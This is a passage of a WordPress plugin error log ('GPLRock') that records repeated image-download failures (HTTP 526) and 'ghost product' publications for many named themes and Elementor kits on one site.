cariera-events-manager-add-on after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 01:04:01 UTC] GPLRock: Image download failed for product cariera-events-manager-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:04:03 UTC] GPLRock: Image download failed for product cariera-events-manager-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:04:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cariera-events-manager-add-on-17446.webp for product cariera-events-manager-add-on after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 01:04:05 UTC] GPLRock WARNING: Image download failed for product cariera-events-manager-add-on. URL: https://meldwp.com/wp-content/uploads/cariera-events-manager-add-on-17446.webp [03-Apr-2026 01:04:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cariera-events-manager-add-on [03-Apr-2026 01:04:05 UTC] GPLRock: Image downloaded successfully for product elementor-team-card (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fb3574e5.webp [03-Apr-2026 01:04:05 UTC] GPLRock: Using pre-downloaded image for product elementor-team-card: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fb3574e5.webp [03-Apr-2026 01:04:05 UTC] GPLRock: Ghost product published with image - Product ID: elementor-team-card [03-Apr-2026 03:09:00 UTC] GPLRock: Image downloaded successfully for product smart-ico-crypto-currency-elementor-pro-full-site-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8b608e6c.webp [03-Apr-2026 03:09:00 UTC] GPLRock: Using pre-downloaded image for product smart-ico-crypto-currency-elementor-pro-full-site-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8b608e6c.webp [03-Apr-2026 03:09:00 UTC] GPLRock: Ghost product published with image - Product ID: smart-ico-crypto-currency-elementor-pro-full-site-kit [03-Apr-2026 03:09:01 UTC] GPLRock: Image downloaded successfully for product smagency-seo-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f4c62339.webp [03-Apr-2026 03:09:01 UTC] GPLRock: Using pre-downloaded image for product smagency-seo-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f4c62339.webp [03-Apr-2026 03:09:01 UTC] GPLRock: Ghost product published with image - Product ID: smagency-seo-marketing-agency-elementor-template-kit [03-Apr-2026 03:09:03 UTC] GPLRock: Image downloaded successfully for product slamat-pandemic-awareness-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9233d779.webp [03-Apr-2026 03:09:03 UTC] GPLRock: Using pre-downloaded image for product slamat-pandemic-awareness-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9233d779.webp [03-Apr-2026 03:09:03 UTC] GPLRock: Ghost product published with image - Product ID: slamat-pandemic-awareness-elementor-template-kit [03-Apr-2026 03:09:04 UTC] GPLRock: Image downloaded successfully for product skye-modern-blog-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-52e06fb3.webp [03-Apr-2026 03:09:04 UTC] GPLRock: Using pre-downloaded image for product skye-modern-blog-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-52e06fb3.webp [03-Apr-2026 03:09:04 UTC] GPLRock: Ghost product published with image - Product ID: skye-modern-blog-elementor-template-kit [03-Apr-2026 03:09:06 UTC] GPLRock: Image downloaded successfully for product skinera-dermatology-skincare-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7cbef697.jpg [03-Apr-2026 03:09:06 UTC] GPLRock: Using pre-downloaded image for product skinera-dermatology-skincare-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7cbef697.jpg [03-Apr-2026 03:09:06 UTC] GPLRock: Ghost product published with image - Product ID: skinera-dermatology-skincare-elementor-template-kit [03-Apr-2026 03:09:08 UTC] GPLRock: Image downloaded successfully for product skaters-skateboarding-community-club-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-58d7b3cf.jpg [03-Apr-2026 03:09:08 UTC] GPLRock: Using pre-downloaded image for product skaters-skateboarding-community-club-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-58d7b3cf.jpg [03-Apr-2026 03:09:08 UTC] GPLRock: Ghost product published with image - Product ID: skaters-skateboarding-community-club-elementor-template-kit [03-Apr-2026 03:09:09 UTC] GPLRock: Image downloaded successfully for product skape-creative-digital-agency-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d8d40bc.webp [03-Apr-2026 03:09:09 UTC] GPLRock: Using pre-downloaded image for product skape-creative-digital-agency-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d8d40bc.webp [03-Apr-2026 03:09:09 UTC] GPLRock: Ghost product published with image - Product ID: skape-creative-digital-agency-business-elementor-template-kit [03-Apr-2026 03:09:11 UTC] GPLRock: Image downloaded successfully for product skans-learning-online-education-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-825f8c2d.webp [03-Apr-2026 03:09:11 UTC] GPLRock: Using pre-downloaded image for product skans-learning-online-education-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-825f8c2d.webp [03-Apr-2026 03:09:11 UTC] GPLRock: Ghost product published with image - Product ID: skans-learning-online-education-elementor-template-kit [03-Apr-2026 03:09:13 UTC] GPLRock: Image downloaded successfully for product siyap-corporate-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d8b69fe.webp [03-Apr-2026 03:09:13 UTC] GPLRock: Using pre-downloaded image for product siyap-corporate-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d8b69fe.webp [03-Apr-2026 03:09:13 UTC] GPLRock: Ghost product published with image - Product ID: siyap-corporate-business-elementor-template-kit [03-Apr-2026 03:09:15 UTC] GPLRock: Image downloaded successfully for product sixx-barbershop-hairdresser-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ad353e27.webp [03-Apr-2026 03:09:15 UTC] GPLRock: Using pre-downloaded image for product sixx-barbershop-hairdresser-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ad353e27.webp [03-Apr-2026 03:09:15 UTC] GPLRock: Ghost product published with image - Product ID: sixx-barbershop-hairdresser-elementor-template-kit [03-Apr-2026 17:18:45 UTC] GPLRock: Image download failed for product content-switcher-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:18:47 UTC] GPLRock: Image download failed for product content-switcher-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:18:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/content-switcher-elementor-32615.webp for product content-switcher-elementor after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:18:49 UTC] GPLRock: Image download failed for product content-switcher-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:18:51 UTC] GPLRock: Image download failed for product content-switcher-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:18:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/content-switcher-elementor-32615.webp for product content-switcher-elementor after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:18:53 UTC] GPLRock WARNING: Image download failed for product content-switcher-elementor. URL: https://meldwp.com/wp-content/uploads/content-switcher-elementor-32615.webp [03-Apr-2026 17:18:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: content-switcher-elementor [03-Apr-2026 17:18:54 UTC] GPLRock: Image download failed for product tiva-timetable-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:18:56 UTC] GPLRock: Image download failed for product tiva-timetable-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:18:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tiva-timetable-for-wordpress-24423.webp for product tiva-timetable-for-wordpress after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:18:58 UTC] GPLRock: Image download failed for product tiva-timetable-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:00 UTC] GPLRock: Image download failed for product tiva-timetable-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tiva-timetable-for-wordpress-24423.webp for product tiva-timetable-for-wordpress after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:19:02 UTC] GPLRock WARNING: Image download failed for product tiva-timetable-for-wordpress. URL: https://meldwp.com/wp-content/uploads/tiva-timetable-for-wordpress-24423.webp [03-Apr-2026 17:19:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tiva-timetable-for-wordpress [03-Apr-2026 17:19:02 UTC] GPLRock: Image downloaded successfully for product live-chat-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bed1d3e0.webp [03-Apr-2026 17:19:02 UTC] GPLRock: Using pre-downloaded image for product live-chat-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bed1d3e0.webp [03-Apr-2026 17:19:02 UTC] GPLRock: Ghost product published with image - Product ID: live-chat-pro [03-Apr-2026 17:19:03 UTC] GPLRock: Image download failed for product kontakt-ajax-contact-form (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:05 UTC] GPLRock: Image download failed for product kontakt-ajax-contact-form (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kontakt---ajax-contact-form-22519.webp for product kontakt-ajax-contact-form after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:19:07 UTC] GPLRock: Image download failed for product kontakt-ajax-contact-form (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:09 UTC] GPLRock: Image download failed for product kontakt-ajax-contact-form (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kontakt---ajax-contact-form-22519.webp for product kontakt-ajax-contact-form after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:19:11 UTC] GPLRock WARNING: Image download failed for product kontakt-ajax-contact-form. URL: https://meldwp.com/wp-content/uploads/kontakt---ajax-contact-form-22519.webp [03-Apr-2026 17:19:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kontakt-ajax-contact-form [03-Apr-2026 17:19:11 UTC] GPLRock: Image download failed for product woocommerce-shop-page-builder-create-any-shop-with-advanced-filters (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:13 UTC] GPLRock: Image download failed for product woocommerce-shop-page-builder-create-any-shop-with-advanced-filters (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-shop-page-builder---create-any-shop-with-advanced-filters-11939.webp for product woocommerce-shop-page-builder-create-any-shop-with-advanced-filters after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:19:15 UTC] GPLRock: Image download failed for product woocommerce-shop-page-builder-create-any-shop-with-advanced-filters (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:18 UTC] GPLRock: Image download failed for product woocommerce-shop-page-builder-create-any-shop-with-advanced-filters (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-shop-page-builder---create-any-shop-with-advanced-filters-11939.webp for product woocommerce-shop-page-builder-create-any-shop-with-advanced-filters after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:19:20 UTC] GPLRock WARNING: Image download failed for product woocommerce-shop-page-builder-create-any-shop-with-advanced-filters. URL: https://meldwp.com/wp-content/uploads/woocommerce-shop-page-builder---create-any-shop-with-advanced-filters-11939.webp [03-Apr-2026 17:19:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-shop-page-builder-create-any-shop-with-advanced-filters [03-Apr-2026 17:19:20 UTC] GPLRock: Image download failed for product gostock-free-and-premium-stock-photos-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:22 UTC] GPLRock: Image download failed for product gostock-free-and-premium-stock-photos-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gostock---free-and-premium-stock-photos-script-30651.webp for product gostock-free-and-premium-stock-photos-script after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:19:24 UTC] GPLRock: Image download failed for product gostock-free-and-premium-stock-photos-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:26 UTC] GPLRock: Image download failed for product gostock-free-and-premium-stock-photos-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gostock---free-and-premium-stock-photos-script-30651.webp for product gostock-free-and-premium-stock-photos-script after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:19:29 UTC] GPLRock WARNING: Image download failed for product gostock-free-and-premium-stock-photos-script. URL: https://meldwp.com/wp-content/uploads/gostock---free-and-premium-stock-photos-script-30651.webp [03-Apr-2026 17:19:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gostock-free-and-premium-stock-photos-script [03-Apr-2026 17:19:29 UTC] GPLRock: Image download failed for product jet-responsive-megamenu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:31 UTC] GPLRock: Image download failed for product jet-responsive-megamenu (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jet---responsive-megamenu-1386.webp for product jet-responsive-megamenu after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:19:33 UTC] GPLRock: Image download failed for product jet-responsive-megamenu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:35 UTC] GPLRock: Image download failed for product jet-responsive-megamenu (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jet---responsive-megamenu-1386.webp for product jet-responsive-megamenu after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:19:37 UTC] GPLRock WARNING: Image download failed for product jet-responsive-megamenu. URL: https://meldwp.com/wp-content/uploads/jet---responsive-megamenu-1386.webp [03-Apr-2026 17:19:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jet-responsive-megamenu [03-Apr-2026 17:19:37 UTC] GPLRock: Image download failed for product wooatm-woocommerce-accordions-tab-manager (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:39 UTC] GPLRock: Image download failed for product wooatm-woocommerce-accordions-tab-manager (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wooatm--woocommerce-accordions--tab-manager-31159.webp for product wooatm-woocommerce-accordions-tab-manager after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:19:42 UTC] GPLRock: Image download failed for product wooatm-woocommerce-accordions-tab-manager (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:44 UTC] GPLRock: Image download failed for product wooatm-woocommerce-accordions-tab-manager (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wooatm--woocommerce-accordions--tab-manager-31159.webp for product wooatm-woocommerce-accordions-tab-manager after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:19:46 UTC] GPLRock WARNING: Image download failed for product wooatm-woocommerce-accordions-tab-manager. URL: https://meldwp.com/wp-content/uploads/wooatm--woocommerce-accordions--tab-manager-31159.webp [03-Apr-2026 17:19:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wooatm-woocommerce-accordions-tab-manager [03-Apr-2026 17:19:46 UTC] GPLRock: Image downloaded successfully for product alert-and-notification-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a6ef5fd6.webp [03-Apr-2026 17:19:46 UTC] GPLRock: Using pre-downloaded image for product alert-and-notification-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a6ef5fd6.webp [03-Apr-2026 17:19:46 UTC] GPLRock: Ghost product published with image - Product ID: alert-and-notification-for-elementor [03-Apr-2026 17:19:46 UTC] GPLRock: Image download failed for product all-in-one-carousel-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:49 UTC] GPLRock: Image download failed for product all-in-one-carousel-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/all-in-one-carousel-for-wordpress-9913.webp for product all-in-one-carousel-for-wordpress after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:19:51 UTC] GPLRock: Image download failed for product all-in-one-carousel-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:53 UTC] GPLRock: Image download failed for product all-in-one-carousel-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:19:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/all-in-one-carousel-for-wordpress-9913.webp for product all-in-one-carousel-for-wordpress after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:19:55 UTC] GPLRock WARNING: Image download failed for product all-in-one-carousel-for-wordpress. URL: https://meldwp.com/wp-content/uploads/all-in-one-carousel-for-wordpress-9913.webp [03-Apr-2026 17:19:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: all-in-one-carousel-for-wordpress [03-Apr-2026 17:23:13 UTC] GPLRock: Image download failed for product riffel-a-bold-rich-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:15 UTC] GPLRock: Image download failed for product riffel-a-bold-rich-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/riffel---a-bold--rich-portfolio-wordpress-theme-13399.webp for product riffel-a-bold-rich-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:23:17 UTC] GPLRock: Image download failed for product riffel-a-bold-rich-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:19 UTC] GPLRock: Image download failed for product riffel-a-bold-rich-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/riffel---a-bold--rich-portfolio-wordpress-theme-13399.webp for product riffel-a-bold-rich-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:23:21 UTC] GPLRock WARNING: Image download failed for product riffel-a-bold-rich-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/riffel---a-bold--rich-portfolio-wordpress-theme-13399.webp [03-Apr-2026 17:23:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: riffel-a-bold-rich-portfolio-wordpress-theme [03-Apr-2026 17:23:21 UTC] GPLRock: Image download failed for product flowto-startup-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:24 UTC] GPLRock: Image download failed for product flowto-startup-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flowto---startup--saas-wordpress-theme-24681.webp for product flowto-startup-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:23:26 UTC] GPLRock: Image download failed for product flowto-startup-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:28 UTC] GPLRock: Image download failed for product flowto-startup-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flowto---startup--saas-wordpress-theme-24681.webp for product flowto-startup-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:23:30 UTC] GPLRock WARNING: Image download failed for product flowto-startup-saas-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/flowto---startup--saas-wordpress-theme-24681.webp [03-Apr-2026 17:23:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flowto-startup-saas-wordpress-theme [03-Apr-2026 17:23:30 UTC] GPLRock: Image download failed for product input-data-science-analytics-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:32 UTC] GPLRock: Image download failed for product input-data-science-analytics-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/input---data-science--analytics-saas-wordpress-theme-7030.webp for product input-data-science-analytics-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:23:34 UTC] GPLRock: Image download failed for product input-data-science-analytics-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:37 UTC] GPLRock: Image download failed for product input-data-science-analytics-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/input---data-science--analytics-saas-wordpress-theme-7030.webp for product input-data-science-analytics-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:23:39 UTC] GPLRock WARNING: Image download failed for product input-data-science-analytics-saas-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/input---data-science--analytics-saas-wordpress-theme-7030.webp [03-Apr-2026 17:23:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: input-data-science-analytics-saas-wordpress-theme [03-Apr-2026 17:23:39 UTC] GPLRock: Image download failed for product tristero-tattoo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:41 UTC] GPLRock: Image download failed for product tristero-tattoo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tristero---tattoo-wordpress-theme-23875.webp for product tristero-tattoo-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:23:43 UTC] GPLRock: Image download failed for product tristero-tattoo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:45 UTC] GPLRock: Image download failed for product tristero-tattoo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tristero---tattoo-wordpress-theme-23875.webp for product tristero-tattoo-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:23:47 UTC] GPLRock WARNING: Image download failed for product tristero-tattoo-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tristero---tattoo-wordpress-theme-23875.webp [03-Apr-2026 17:23:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tristero-tattoo-wordpress-theme [03-Apr-2026 17:23:47 UTC] GPLRock: Image download failed for product kingler-weapon-store-gun-training-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:50 UTC] GPLRock: Image download failed for product kingler-weapon-store-gun-training-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kingler--weapon-store--gun-training-wordpress-theme-10197.webp for product kingler-weapon-store-gun-training-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:23:52 UTC] GPLRock: Image download failed for product kingler-weapon-store-gun-training-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:54 UTC] GPLRock: Image download failed for product kingler-weapon-store-gun-training-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kingler--weapon-store--gun-training-wordpress-theme-10197.webp for product kingler-weapon-store-gun-training-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:23:56 UTC] GPLRock WARNING: Image download failed for product kingler-weapon-store-gun-training-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kingler--weapon-store--gun-training-wordpress-theme-10197.webp [03-Apr-2026 17:23:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kingler-weapon-store-gun-training-wordpress-theme [03-Apr-2026 17:23:56 UTC] GPLRock: Image download failed for product sweet-jane-delightful-cake-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:23:58 UTC] GPLRock: Image download failed for product sweet-jane-delightful-cake-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sweet-jane---delightful-cake-shop-wordpress-theme-11569.webp for product sweet-jane-delightful-cake-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:24:00 UTC] GPLRock: Image download failed for product sweet-jane-delightful-cake-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:03 UTC] GPLRock: Image download failed for product sweet-jane-delightful-cake-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sweet-jane---delightful-cake-shop-wordpress-theme-11569.webp for product sweet-jane-delightful-cake-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:24:05 UTC] GPLRock WARNING: Image download failed for product sweet-jane-delightful-cake-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sweet-jane---delightful-cake-shop-wordpress-theme-11569.webp [03-Apr-2026 17:24:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sweet-jane-delightful-cake-shop-wordpress-theme [03-Apr-2026 17:24:05 UTC] GPLRock: Image download failed for product foodymat-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:07 UTC] GPLRock: Image download failed for product foodymat-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodymat--restaurant-wordpress-theme-326.webp for product foodymat-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:24:09 UTC] GPLRock: Image download failed for product foodymat-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:11 UTC] GPLRock: Image download failed for product foodymat-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodymat--restaurant-wordpress-theme-326.webp for product foodymat-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:24:13 UTC] GPLRock WARNING: Image download failed for product foodymat-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/foodymat--restaurant-wordpress-theme-326.webp [03-Apr-2026 17:24:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: foodymat-restaurant-wordpress-theme [03-Apr-2026 17:24:13 UTC] GPLRock: Image download failed for product 